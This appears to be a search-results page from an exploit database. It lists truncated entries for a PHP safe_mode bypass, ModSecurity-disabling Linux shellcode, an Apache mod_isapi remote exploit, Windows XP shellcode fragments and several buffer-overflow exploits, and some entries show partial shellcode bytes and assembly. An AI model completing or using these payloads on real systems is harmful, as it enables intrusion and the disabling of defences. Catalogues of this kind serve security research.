7260 matches found
Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)
No description provided by source. ?php / Kolang PHP Safe mode bypass IHSteam priv8 for lazy penetration testers php 4.3.10 - 5.3.0 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018 12/19/2009 http://www.milw0rm.com/exploits/7393 12/09/2008 1- Kolang can be used directly in file...
Linux x86 - disabled modsecurity - 64 bytes
No description provided by source. view source print? / [email protected] - Goodfellas Security Research Team - 2010 /usr/sbin/a2dismod mod-security2 - disable modsecurity 64 bytes asm "xor %eax,%eax \n" "push %eax \n" "cdq \n" "push $0x646f6d73 \n" "push $0x69643261 \n" "push $0x2f6e6962...
Apache 2.2.14 mod_isapi Remote SYSTEM Exploit
/ Apache 2.2.14 modisapi Dangling Pointer Remote SYSTEM Exploit CVE-2010-0425 ------------------------------------------------------------------------------ Advisory: http://www.senseofsecurity.com.au/advisories/SOS-10-002 Description: pwn-isapi.cpp exploits a dangling pointer vulnerabilty in...
Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
Exploit for unknown platform in category remote exploits ============================================================== Apache 2.2.14 modisapi Dangling Pointer Remote SYSTEM Exploit ============================================================== / Apache 2.2.14 modisapi Dangling Pointer Remote...
Kolang 4.3.10 5.3.0 - proc_open() PHP safe_mode Bypass
Kolang 4.3.10 5.3.0 - procopen PHP safemode Bypass // "shellcode loader" : load and execute arbitrary shellcode from a file // Hami...
Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)
Exploit for unknown platform in category web applications ====================================================== Kolang procopen PHP safe mode bypass 4.3.10 - 5.3.0 ====================================================== ?php / Kolang PHP Safe mode bypass IHSteam priv8 for lazy penetration testers...
Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass
// "shellcode loader" : load and execute arbitrary shellcode from a file //...
Linux x86 - disabled modsecurity - 64 bytes
Linux x86 - disabled modsecurity - 64 bytes. Shellcode exploit for linx86 platform / [email protected] - Goodfellas Security Research Team - 2010 /usr/sbin/a2dismod mod-security2 - disable modsecurity 64 bytes asm "xor %eax,%eax \n" "push %eax \n" "cdq \n" "push $0x646f6d73 \n" "push...
linux/x86 - disabled modsecurity - 64 bytes
Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 - disabled modsecurity - 64 bytes =========================================== / email protected - Goodfellas Security Research Team - 2010 /usr/sbin/a2dismod mod-security2 - disable...
win32/xp sp3 (Ru) cmd 13 bytes
Exploit for win32 platform in category shellcode ============================== win32/xp sp3 Ru cmd 13 bytes ============================== Tested on Windows XP Pro Rus sp3. Probably, will work with any service pack present. 68 636D6420 push 0x20646D63 54 push esp B8 C793C177 mov eax,msvcrt.syste...
win32/xp sp3 English (calc.exe) 37 bytes
Exploit for win32 platform in category shellcode ======================================== win32/xp sp3 English calc.exe 37 bytes ======================================== / Windows Xp Home edition SP3 english calc.exe 37 bytes shellcode by: Hazem mofeed The Shellcode:...
Windows XP Home Edition SP3 English calc.exe 37 bytes
Windows XP Home Edition SP3 English calc.exe 37 bytes. Shellcode exploit for win32 platform / Windows Xp Home edition SP3 english calc.exe 37 bytes shellcode by: Hazem mofeed The Shellcode: http://www.exploit-db.com/exploits/11598 Modified to working In SP3, Home: www.pentestlabs.com greetz:...
Windows Xp Home Edition SP2 English calc.exe 37 bytes
Windows Xp Home Edition SP2 English calc.exe 37 bytes. Shellcode exploit for win32 platform / Windows Xp Home edition SP2 english calc.exe 37 bytes shellcode by: Hazem mofeed Aka Hakxer penetration testing labs www.pentestlabs.com / char evil =...
Windows Xp Home Edition SP2 English ( calc.exe ) 37 bytes
No description provided by source. / Windows Xp Home edition SP2 english calc.exe 37 bytes shellcode by: Hazem mofeed Aka Hakxer penetration testing labs www.pentestlabs.com / char evil = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x8d\x15\x86\x7c\xff\xd3\x31\xc0"...
Portable Executable (PE) 16-bit File (CVE-2010-0232; CVE-2011-2003)
An elevation of privilege vulnerability exists in the Windows Kernel due to the way the kernel handles certain exceptions. The Windows Kernel is the core of the operating system. It provides system level services such as device management and memory management, allocates processor time to...
win32/xp sp2 English (calc.exe) 37 bytes
Exploit for win32 platform in category shellcode ========================================================= Windows Xp Home Edition SP2 English calc.exe 37 bytes ========================================================= / Windows Xp Home edition SP2 english calc.exe 37 bytes shellcode by: Hazem...
Orbital Viewer 1.04 SEH Overflow
!/usr/bin/python sinn3r: I'm just submitting this for mrme Orbital Viewer v1.04 .orb 0day Local Universal SEH Overflow Exploit Date: 27 Feb 2010 CVE: CVE-2010-0688 Download: http://www.orbitals.com/orb/ov.htm Found & exploited by: mrme http://net-ninja.net Greetz to:...
Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
Exploit for unknown platform in category local exploits ===================================================================== Orbital Viewer v1.04 .orb 0day Local Universal SEH Overflow Exploit ===================================================================== !/usr/bin/python Orbital Viewer...
Easy FTP Server 1.7.0.2 Remote BoF
Other vulnerabilities covered in bid:38262 === Infos === Credit: loneferret Found: 18/02/10 Versions affected = 1.7.0.2 === Description === Lack of input length checks for the CWD command result in a buffer overflow vulnerability, allowing the execution of arbitrary code by a remote attacker. ===...
Mediacoder 0.7.3.4605 - Local Buffer Overflow
Mediacoder 0.7.3.4605 - Local Buffer Overflow / Download: http://www.mediacoderhq.com/download.htm Compilation: mediac.c.......Win32cygwin,Devcpp Tested on Windows xp sp3 Date: 24.02.2010 1.We get control of EIP by overwriting a seh handler with pop pop retn instr and pass exception. 2.We positio...